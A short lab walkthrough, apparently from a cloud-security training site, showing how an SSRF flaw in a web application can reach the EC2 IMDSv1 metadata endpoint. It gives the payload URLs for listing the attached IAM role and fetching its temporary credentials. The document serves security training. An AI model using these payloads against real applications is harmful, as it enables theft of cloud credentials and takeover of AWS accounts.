Abusing SSRF to Access EC2 Instance Metadata (IMDSv1) and Steal IAM Role Credentials

In this scenario, we simulate an attack on an EC2 instance that has IMDSv1 enabled and a role with write-level privileges attached. The instance also hosts a web application vulnerable to Server-Side Request Forgery (SSRF). An attacker leverages the SSRF vulnerability to access the IMDSv1 metadata endpoint, retrieves temporary security credentials associated with the attached IAM role, and uses them to gain write access to AWS resources within the account.

1. Access the SSRF-vulnerable web application

https://lab.5minutescloud.com/attack-path/aws/imdsv1-ssrf

2. Enter the following payload to fetch the name of the IAM role attached to the instance. The role name is needed in the next step to request the role's programmatic credentials.

http://169.254.169.254/latest/meta-data/iam/security-credentials/

3. Now that we have the role name, AdministratorAccessRoleForEC2, let's fetch the credentials using the following payload.

http://169.254.169.254/latest/meta-data/iam/security-credentials/AdministratorAccessRoleForEC2